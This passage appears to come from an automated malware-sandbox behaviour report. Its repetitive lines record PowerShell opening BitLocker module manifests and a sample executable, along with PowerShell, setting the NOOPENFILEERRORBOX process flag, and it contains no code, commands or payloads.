                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
